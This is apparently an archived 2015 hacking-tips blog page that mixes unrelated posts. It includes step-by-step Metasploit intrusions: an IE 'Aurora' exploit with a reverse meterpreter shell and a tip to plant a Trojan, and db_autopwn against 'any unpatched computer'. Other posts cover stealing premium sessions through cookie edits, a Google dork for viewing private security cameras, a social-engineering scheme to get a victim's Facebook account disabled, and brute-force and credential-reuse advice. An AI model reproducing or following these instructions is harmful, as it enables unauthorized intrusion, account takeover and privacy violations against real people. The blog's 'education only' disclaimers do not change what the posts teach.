Saturday 31 January 2015

HowTo Install Android on Windows

Android from google has made a huge impact in smartphone technology. It is now one of the most used OS for smartphone. If you do not have an Android Smartphone and yet u wanna try Android appz/games/etc, u can now do it on your PC. I would give a short yet easy tutorial on howto install android on your pc.


1. Download Android SDK, AVD Manager
2. Install it
3. Install packages

 



4. You can choose any or even all packages or just the latest Android 2.3 /2.2/2.1



5. Create a virtual device clicking "New" 



  • Name of the device Android.2.3 or Android.2.2 or Android.2.1 depending which u   installed

6. Start the device:



7. Next, Click "Launch"

8. Here are the booting images






Congratulation, you can now enjoy all what are supposed could only be enjoyed on Android Smartphone without the need to buy one. It has the well-known android browser, just go to the android market and enjoy your "new gadget".
Keep Visiting

Hack PC(Get Command Line) without Sending Any File

First you Must Download Metasploit:



Code:
http://www.metasploit.com/releases/framework-3.3.3.exe

(Windows OS)
After Download & Install

Run Metasploit Update And Wait Until Update Complete!
Then Run Metasploit Console



Then Do Like This(Bolds Texts is Which You must Write):

msf > use exploit/windows/browser/ie_aurora
msf exploit(ie_aurora) > set PAYLOAD windows/meterpreter/reverse_tcp
msf exploit(ie_aurora) > set LHOST (your IP)
msf exploit(ie_aurora) > set URIPATH /
msf exploit(ie_aurora) > exploit
[*] Exploit running as background job.[*] Started reverse handler on port 4444[*] Local IP:http://192.168.0.151:8080/[*] Server started.

msf exploit(ie_aurora) >

Open Internet Explorer on a vulnerable machine (we tested Windows XP SP3 with IE 6) and enter the Local IP URL into the browser. If the exploit succeeds, you should see a new session in the Metasploit Console:

[*] Sending stage (723456 bytes)[*] Meterpreter session 1 opened (192.168.0.151:4444 -> 192.168.0.166:1514)

msf exploit(ie_aurora) > sessions -i 1[*] Starting interaction with 1...

meterpreter > getuid
Server username: WINXP\Developer

meterpreter > use espia
Loading extension espia...success.

meterpreter > shell
Process 892 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
© Copyright 1985-2001 Microsoft Corp.


C:\Documents and Settings\Developer\Desktop>

[ Remember CMD is Most Useful Control of WIN32 You Can Use FTP Command! To Download Trojan in slave PC! And Run it ]

Keep Visiting 

How to use cookie to get access to premium account

You need Mozilla firefox before you can do this cookie edit.

Step 1. Start firefox
Step 2. Go to Tools



Step 3. There go to Add-ons

[Image: 40011749.png]
 

Step 4. In Add-ons press Get Add-ons

[Image: 34644398.png]

Step 5. Search for "cookie"


[Image: 77053296.png]

Step 6. Install the one named "Edit Cookies" and restart firefox


[Image: 80865331.png]

Step 7. Then go to filehost site you want to login as premium



[Image: 3570373.png]

Step 8. Login with non premium account. For example on megaupload you can use this Username: kenedaa Password: siavonen


[Image: 65003151.png]

Step 9. Go to tools again and select "Edit cookie" from bottom

[Image: 30351787.png]

Step 10. When you open it there is empty box put in there "megaupload" then press Filter/refresh button


[Image: 43102575.png]

Step 11. In there you should see cookie named "user" click on it and then click on button "edit"


[Image: 88457044.png]

Step 12. Then there should pop-up "add/edit cookie" window. Fill in there the content you have been given


[Image: 65832494.png]

Step 13. Then just Press "save". Close cookie editor


Step 14. Refresh the site and there it is premium account ^^



If it does not work for you just PM me or Comment ^^
                                                                                  :)

Keep Visiting 

Learn Basic JavaScript Hacking: How to Hack with Java Script

LEVEL 1:
 
You must first obtain the "source code": Set the security of Internet Explorer to high, click on the link to level 1 at the very top of the menu bar, Internet Explorer, the File, Edit, View, etc. Press the "View", "Source".This will take it up a Notepad window. Look for:


passwort=prompt("Please enter password!","") passwort = prompt ( "Please enter password !","")

This ensures a prompt box you can write in, that you enter as a password is stored in the variable "passwort".

if (passwort=="easy") if (passwort == "easy")

This checks on "passwort" (what you type) is "easy", the password for level 1 is when the "easy".

Set back security to medium and click on the link to the Level 1and type "easy".

Use the same procedure to obtain the "source code".



LEVEL 2:
Once you have retrieved the Notepad window, there will be a lot of code. Just scroll further down, find this:

var m1, i; was m1, i;
m1="JavaScript"; m1 = "JavaScript";
value=prompt("Please enter password!",""); value = prompt ( "Please enter password !","");
if (value==m1) { if (value == m1) (
window.location=value+".htm"; window.location = value + ". htm";
i=4; i = 4;

What you type being stored in the variable "value",

if (value==m1) if (value == m1)

"m1" is a variable that contains a value. See further up:




m1="JavaScript " m1 = "JavaScript"
The password is "JavaScript".

Keep Visiting

Hacking Security Cameras

There exists many security cameras used for monitoring places like parking lots, college campus, road traffic etc. which can be hacked using Google so that you can view the images captured by those cameras in real time.

All you have to do is use the following search query in Google. Type in Google search box exactly as follows and hit enter
inurl:”viewerframe?mode=motion”

Click on any of the search results to access a different set of live cameras. Thus you have hacked Security Cameras using Google.

Keep Visiting

Whatsapp Free For Lifetime

Whatsapp Free For Lifetime

Whatsapp Free For Lifetime

Requirements

  1. Apple Account
  2. Patience
  3. iPhone (temporary required)

Steps to Make Whatsapp Free For Lifetime Hack

  1. First of all you need to download and install iTunes, It helps to easy create Apple Account. In this way you get apple account.
  2. Second Patience, it tradition on iOS where they give various free apps. So every year there period when whatsapp is completely free on iOS for example, lifetime subscription.


  • Finally real trick is started now, you need a iPhone for this you can easily borrow from your friends. Now you can download WhatsApp from Apps store for free of cost with your account, now logout from his Apple account, install it on your friend’s iPhone with your sim card in it.
  • After installing, you enter your required data and Done, Then, logout your WhatsApp Account. Take out of your sim card put it in your Android phone, download and install WhatsApp from your Apps Store like Play Store. Now go to your WhatsApp Settings > Account > Payment finally you found 


    1. Here are the trick to make Make Whatsapp Free For Lifetime Hack, Don’t forget to share this trick hacks with your friends. If you found any problem feel free to discuss in below comment

    Top Apps to Get Free Recharge Tricks 2015

    So these were Free Recharge tricks 2015grtop apps to get free recharge 2015 tips and hacks and I hope you liked them all. We will be coming up with more free recharge tricks in 2015 compilation in future. This is the great way to get free recharge by downloading apps and invite friends, download apps and then referring it to your friends. You will get unlimited Rs by download some apps which located at offers category that you can Redeem for free talktime. In addition when you refer your friends by your referral URL you will get Rs. 50 per successful referral that can also be redeemed for free talktime. Stay connected for latest free internet tricks of airtel, bsnl, vodafone, idea free internet and recharge tricks 2015. Latest Earn talktime hack tricks to get free recharge

    Free Recharge Trick 2015

    1) Earn Talktime App

    Introducing the all new experience of earning while you recharge your or your dear ones phone. All you need to have an android phone to Download EarnTalktime Android App and Earn Free Recharge Trick 2015 . Earntalktime not only gives you an joyful, easy, user friendly way of recharging mobiles but also offers discounts on shopping, watching videos. What more!!! you earn even while you invite your dear ones to download this app. It is also offers personalized offers on basis of your profile, location and preferences. The rewards you get against each offer you opt, will be in terms of cash that you can utilize to recharge your own and yours friends/families PrePaid mobile number.



    Get free recharge by using Earn Talktime App

    1. Download Android App by Click below link :-
    2. After download, Verify your’s Mobile Number.
    3. NOTE: Then, Go to “Offers” Category to download free apps and Earn Unlimited Talktime.
    4. And Go to “Invite Friends” Category to invite friends and get Rs. 50 per successful referral that can also be redeemed for free talktime.

    2) mCent

    This is one of the most downloaded and with most five stars in the plsy store. This is the app that pay more than ever. How they pay us what we need to do, this is very simple app just download and signup there and they give you Rs 10 per refer bonus for sign-up and then if you refer and any friend to this app then they pay you 20 for one invitation.

    3) LADOOO

    Another app which i have tested, this is very interesting good looking app which pay good money to there users easy to use and easy to access app.
    How it work – this is another app which pay you form download app that they given you to download and also pay you for inviting Friends to there app. For every successful app download and invitation you will get paid according to prices shown there in app every invitation get Rs.5. There is minimum Amount for Redemption as you can redeem Rs.20 minimum.


    Some Screenshots of  Free Recharge Tricks 2015

     

    Screenshot_2014-11-25-18-16-54 Screenshot_2014-11-25-18-17-02 Screenshot_2014-11-25-18-17-16
     

    Introducing the all new experience of earning while you recharge your or your dear ones phone. All you need to have an android phone and above  are the top android apps to get free recharge and Download EarnTalktime, mCent Android App by using this app you get free recharge 2015 and Earn money ! 

     

    Keep Visiting

    12 Best Android Hacking Apps


    Hackode

     

    Lets see 12 Android Hacking Apps that are meant for hacking, hackers, security researchers;
    Hackode : The hacker’s Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc.

    Androrat

     

    Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.

    APKInspector

     

    APKinspector is a powerful GUI tool for analysts to analyse the Android applications. The goal of this project is to aide analysts and reverse engineers to visualize compiled Android packages and their corresponding DEX code.

    DroidBox


    DroidBox is developed to offer dynamic analysis of Android applications.

    Burp Suite


    Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application’s attack surface, through to finding and exploiting security vulnerabilities.

    zANTI

     

    zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.



    Droid Sheep

     

    DroidSheep can be easily used by anybody who has an Android device and only the provider of the web service can protect the users. So Anybody can test the security of his account by himself and can decide whether to keep on using the web service.

    dSploit

     

    dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assessments on a mobile device.

    AppUse

     

    Android Pentest Platform Unified Standalone Environment:- AppSec Labs recently developed the AppUse Virtual Machine. This system is a unique, free, platform for mobile application security testing in the android environment, and it includes unique custom-made tools created by AppSec Labs.

    Shark for Root

     

    Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open dump use WireShark or similar software, for preview dump on phone use Shark Reader. Based on tcpdump.

    Nmap for Android

     

    Nmap (network mapper) is one the best among different network scanner (port finder) tool, Nmap mainly developed for Unix OS but now it is available on Windows and Android as well. Nmap for android is a Nmap apps for your phone! Once your scan finishes you can e-mail the results. This application is not a official apps but it looks good.

    SSHDroid

     

    Android Secure Shell: Secure shell or SSH is the best protocol that provides an extra layer of security while you are connecting with your remote machine.SSHDroid is a SSH server implementation for Android. This application will let you to connect to your device from a PC and execute commands (like “terminal” and “adb shell”).

    Note:- All content are intended for Security Research Purpose and should not be used illegaly. In our tutorials we only EVER hack our own systems as a proof of concept and never engage in any black hat activity. Every post here is for your online security, safety or for awareness, and we do not teach hacking through our articles, If you know how to Hack, you must know how to Secure and We provides you another chance to Create Something Best and More Stronger.


    Keep Visiting

    Learn How to EXPLOIT : The Basics of EXPLOITING




    NOTE 1: Some statements in here apply to beginners. If you read this and are an advanced user, you might say: "That is not true, I know a way....". Correct. But it is impossible to include every exception and technique without creating confusion. Read this essay as if you are a beginner....

    NOTE 2: Some basic rules all good crackers and exploiters adhere to: Do not change, alter, or delete any info you may find on a site. This is just not done, and can actually
    result in prosecution if you get caught.

    On your exploiting journey, you may also come across confidential information from members, such as home addresses, credit card info etc. I know I have, many times over. I even found a hole where I could have the checks of site referrals sent to my account! Never use this information to your personal gain! This will be considered theft and misuse of personal information, and can get you into serious trouble...


    OK, now with that out of the way, let's start the series on Exploiting...!

    EXPLOITING - THE BASICS

    OK, so you are tired of bruteforcing, have spoofed a couple of sites, and have seen posts with custom passes or complete member lists...and you wanna know how... If so, this essay is for you.

    This basic exploiting essay assumes you understand or master the following techniques and skills with respect to website security:
    • - Basic HTML
    • - Brute forcing
    • - Proxy use
    • - Basic URL handling
    • - Basic website structures
    • - Basic Spoofing
    • - Good AD skills or similar
    But most importantly, you need a good brain and have a sincere interest in website security. Exploiting takes a lot of time and requires research on a regular basis. On the other hand, the rewards are well worth the effort in my opinion!

    When trying to test the security of websites, you can gain access in the following manners, listed in order of technical difficulty: 
    1. Guess passwords
    2. Brute force attacks
    3. Spoof the site
    4. Get and decrypt passfiles or logs
    5. Using scripts to add passes
    6. Get admin access (via telnet or browser)
    7. Hack the server via telnet
    As you can see in the list above, exploiting is really nothing more than increasing your chances of getting access. Guessing passwords...to bruteforcing...to decrypting passfiles or logs...you increase your chances of getting a working pass with less effort!

    HTACCESS and HTPASSWD

    Since there are excellent tuts on this already, I am not going to spend a lot of time on this. One question I see a lot from newbies is that they "can not locate the htpasswd"....

    A few notes on htaccess and htpasswd:
    • - htaccess only sometimes shows the dir to the htpasswd (or passwd or different name)
    • - the chances of getting this file are slim, as this vulnerability is well-known out there and most webmasters have denied you access, hidden the file, or placed the file on their home dir.

    For the fans, here is some more detailed info on the subject I found:
    In order to find the .htpasswd (or interpret the .htaccess) you need to understand the difference between the web root and the system root.

    The AuthUserFile is specified in terms of the system root. That is, the directory structure you would see if you were actually logged into the computer through a terminal.

    When a web browser accesses a machine, it is through a web server. The web server is configured so that the browser will start at some specific directory in the machine. I refer to that as the web root. It is specified in the web server configuration file, off in some directory you can't browse to.

    So, lets say that the web root is set to /home/users/www.site.com/www. When you surf to http:/www.site.com/ you find yourself in the machine directory /home/users/www.site.com/www (but nothing really tells you that), and if there is an index.html there, you will display it.

    So lets say that the web root is set as above, and that the .htaccess contains the line:

    code:

    --------------------------------------------------------------

    AuthUserFile /home/users/www.site.com/www/hidden/.htpasswd

    --------------------------------------------------------------
    (or something similar)

    Applying what I said above, you would find the .htpasswd at:

    code:
    --------------------------------------------------------

    http://www.site.com/hidden/.htpasswd
    --------------------------------------------------------

    Since the web root is /home/users/www.site.com/www. You still may not be able to read it because it might be forbidden through some other method, say only accessible from certain IP addresses, or . files are not accessible through their web server.

    Now, lets say the .htaccess said:


    code:
    --------------------------------------------------------------

    AuthUserFile /home/users/abc.com/hidden/.htpasswd

    --------------------------------------------------------------

    Now, there is no way we can get to it since the web root puts us in home/users/www.site.com/hidden/www and we are well past the days when you could back up above a web root in an Apache web server.

    If ../ worked, we would be in luck, since we could specify http://www.site.com/../hidden/.htpasswd. This used to work, or the unicoded version worked, or the double unicoded version worked, or quotes worked, or unicoded quotes, etc., etc. Not so anymore....
    Our only hope, when the .htpasswd is not on the web root, is to find another exploit that will allow us to access files. Such things exist but are hard to find, so read on....

    SO NOW WHAT?

    Well, as you tried to get the passfile looking for it in the obvious locations, and failed...maybe there are other ways of obtaining it....

    Using AD or another security scanner, you can start looking for so-called vulnerabilities. This means testing the website for security, and trying to find ways into the site. How does this work, you ask? We need a tool to test the security...

    For these essays, I will be talking about a tool called WebSiteFinder, or WSF in short. Written by Wolfman, this is a great tool, in my opinion. AD or Passcraft can do the same, so use whatever you feel comfortable with. If you start out, use AD.

    To make these tools really effective, you need an exploit list. This is a list of basic paths that will be tested for possible vulnerabilities or access against the website. AD offers a basic exploit list, at least the older versions did. Exploit lists can be found all over the web, but please realise these are very basic, and some of the holes (=vulnerabilities) they have in it, are old and will not work anymore on most sites.

    HOW TO MAKE YOUR OWN EXPLOIT LIST

    Really good exploiters or crackers will not share their lists with you. The reason: Once some exploits are made public, chances are the holes will be discovered quickly and thus closed! And that is a bummer.

    So you have to build your own list. How, you ask? Here are a few tips.

    1. ANALYZE, THINK, STUDY, BE CREATIVE

    First place to start, is to analyze your current exploit list. What makes sense, and what does not. What paths do you understand? Why do you think that particular path is a vulnerability, and if you came accross it, how would you use it? If you don't know, ask on a forum via PM, there are many people around that can and will help you. Moreover, read up on security sites (better get used to it), such as packetstorm, securiteam, etc.

    NOTE: It is no use to just try exploits on sites if you don't understand what you are doing. The results can be very bad. You could, unwillingly, do damage to the site!

    2. KEEP YOUR EYES ON THE SCREEN

    Look at directory trees of sites you visit. Try to go up and down in levels in the dir to possibly find more holes...copy these to your exploit list.

    3. STATS and LOGS
    These are KING in my book. Why? Stats show the requests made to a website, and some stats list all the requests....including those of someone trying to exploit the site. The paths that this person tried may not have worked on the site, but heh, copy them to your exploit list, they may come in handy for other sites! Access logs show the same thing...moreover, they might tell you alot about the server, home server (FTP logs), usernames, and the basic website structure.


    INTERMEZZO: "What to do with the usernames?"

    This is a question I get a lot. Someone has seen the stats, and now has a list of usernames. Now what? Well, half the battle is won! Remember the statement I made about increasing your chances in getting access? This is it! Proceed in two ways:
    1. Use the usernames and one of your wordlists to do a BF attack
    2. Match the usernames to working combos you have. There are tools for this, and try to see if the combos work. Many users use the same password for different sites...see where I am getting at?

    4. GOOGLE, GOOGLE, GOOGLE!

    I love google. I embrace googling. You should too. Make googling your hobby! Type in a path or exploit, and see what you get, you will be surprised! It will lead you to access logs, vulnerability reports, cool sites, etc. Whatever you find and think is useful, copy to your exploit list...

    Keep Visiting

    Hack Any Computer With An ip [MetaSploit]

    Hello everybody! I am here to show you this magical tool called Metasploit that allows you to hack ANYunpatched computer with only it's IP. Lets begin...

    1.) First you need to download Metasploit. The most up-to-date version is FREE at metasploit.com.



    2.) You need PostgrSQL for your database. Download here: http://www.postgresql.org/. Make sure you use all the defaults or Metasploit woun't work!

    3.) Now lets get down to buisness... After installing both tools, open up the PostgrSQL admin gui (start -> all programs -> PostgreSQL 9.0 -> pgAdmin III). Then right-click on your server (in the left hand box) and click connect. Remember to keep this window open the whole time. You will also need the pass you chose to use in step 5...

    [Image: pgadmin.bmp]

    4.) Time for some hacking! Go to start -> all programs -> Metasploit Framework, and then open the Metasploit gui. Let it load untill it look like this:

    [Image: metasploit.bmp]

    5.) Now, in the window type:


    db_connect postgres:ThePassYouChose@localhost:5432

    The first time you do this you will see lots of text flash buy. Don't wory, this is normal.

    6.)Type db_host to make sure you are connected correctally.

    7.)Now type this:

    db_nmap 000.000.000.000

    Make sure you put the ip of the computer you are trying to hack in the place of 000.000.000.000...

    8.) Now we get to the fun part; the automatic exploitation. Just type db_autopwn -t -p -e -s -b , watch the auto-exploitation start, go play Halo for a while, and then come back...

    9.) After the exploitation is done, type sessions -l to see what the scanner found. If all went well, you should see a list of exploits.

    10.) Now we get to use the exploits to hack the computer! If you will notice, all of the exploits are numbered, and they all have obvious names (i. e., reverseScreen_tcp). In order to use an exploit, type this:


    sessions -i ExploitNumber

    ___________________________________________________________

    The features of Metasploit are mutch like a rat. Once you get into someone's computer, you can see their screen, controll their mouse, see what they type, see them, etc.

    Keep Visiting

    Friday 30 January 2015

    Shutdown Your System Faster


    Is your system shutting down too slow ? With a few registry tweaks the system can be shut down far morefaster.Check  these registry tweaks for faster System Shutdown.The results are quite impressive
    Autoend all tasks and Programs during Shutdown

    1.From the Start Menu click Run and type “regedit”.(without quotes).
    2.Navigate to HKEY_CURRENT_USER > Control Panel > Desktop.
    3.Right Click on the Registry key “Autoend tasks “and select Modify.Change the value to 1.
    Autoend tasks

     

    Change the Application Hang Time

    1.Open the registry editor by typing “regedit”(without quotes) in the run box from the Start Menu.
    2.Navigate to HKEY_CURRENT_USER > Control Panel > Desktop.
    3.There you will find a lot of registry keys.Find WaitToKillAppHangAppTime in the right hand pane.The default values are 20000 and 5000 respectively.Change them to 1000.( To change the value right click and select modify).

    Disable Clearing of the paging File

    When you shutdown your system Windows automatically clears the paging files( temporary files which may contain useful information) for security reasons.If you want not to clear the paging files everytime you shutdown you can save some seconds.

    1.As usual,open the registry editor and navigate to
    HKEY_LOCAL_MACHINE > SYSTEM > Current ControlSet > Control > Session Manager > Memory Management.]
    2.You will find a registry key on the right hand pane named ClearPageFileOnShutdown.Right click it and select modify.Set the value to 0.

    Keep Visiting

    How To Delete Your Friend,s Facebook Account.

    This tutorial is education purpose only, once deleted profile can never be recovered.
    This is an extreme example of Social Engineering technique, we need following things to do so.


    1. Victim’s profile link ( you can get it easily )
    2. His/Her Email which he/she uses to sign in
    3. His/Her birth date which he/she has used in the profile
    4. Make an Email ID on gmail or yahoo with the first name and last name same as on victim’s facebook profile.

    Ckeck Out Here

    Now you will get this screen



    • Enter details. In the place of ‘ email address where you can be contacted ‘ enter the fake email u created.
    • You will get a email on that ID in which facebook people will ask your problem. Reply to them that you are XYZ( victim’s name ) and you cant access your facebook account. Also you have lost access to your Email Address associated with the account. You dont know what to do now. The hacker is coming online regularly and using your account. If the victim is a girl also write ‘ I am a girl and it poses threat to my social life ‘ and write anything you want that could make them take action.
    • After 2-3 days youu will get a reply. They will again ask you that you have access to your associated Email or not? Reply them that you still don’t have access to it. And repeat what all you wrote in first mail.

    • Next Day or Same Day you will get an Email that your account is disabled.

    Keep visiting

    BackBox Linux 4.1 released!



    BackBox Linux 4.1 released, A Linux operating system based on Ubuntu and designed for penetration testing and security assessments
    BackBox is an open source and free Linux distribution based on the world’s most popular free operating system, Ubuntu, built around the lightweight Xfce desktop environment and developed to perform security assessments and penetration tests.

    Distributed as Live DVDs for 64-bit and 32-bit platforms

    The operating system can be downloaded from Softpedia or its official website as Live DVD ISO images of approximately 2GB in size each, designed to support the 64-bit (amd64) and 32-bit (i386) hardware platforms.

    Boot options

    Being based on Ubuntu, BackBox’s Live DVDs come with a standard, Ubuntu-style boot menu that allows the user to try the operating system without installing anything in forensics mode, persistent mode, text mode or compatibility mode, as well as to boot an existing OS from the first disk. It supports five languages, English, German, Spanish, French and Italian.

    What's new in BackBox Linux 4.0:



  •     Preinstalled Linux Kernel 3.13
  •     New Ubuntu 14.04 base
  •     Installer with LVM and Full Disk Encryption options
  •     Handy Thunar custom actions
  •     RAM wipe at shutdown/reboot
  •     System improvements
  •     Upstream components
  •     Bug corrections
  •     Performance boost
  •     Improved Anonymous mode
  •     Predisposition to ARM architecture (armhf Debian packages)
  •     Predisposition to BackBox Cloud platform
  •     New and updated hacking tools




  • Default apps include the Geany IDE, GIMP image editor, Mozilla Firefox web browser, Mozilla Thunderbird email and news client, FileZilla file transfer client, Pidgin multi-protocol instant messenger, TorChat anonymous chat client, XChat IRC client, Transmission torrent downloader, Brasero CD/DVD burning software, VLC Media Player, BleachBit system cleaner, Synaptic Package Manager, and LibreOffice office suite.

    Keep visiting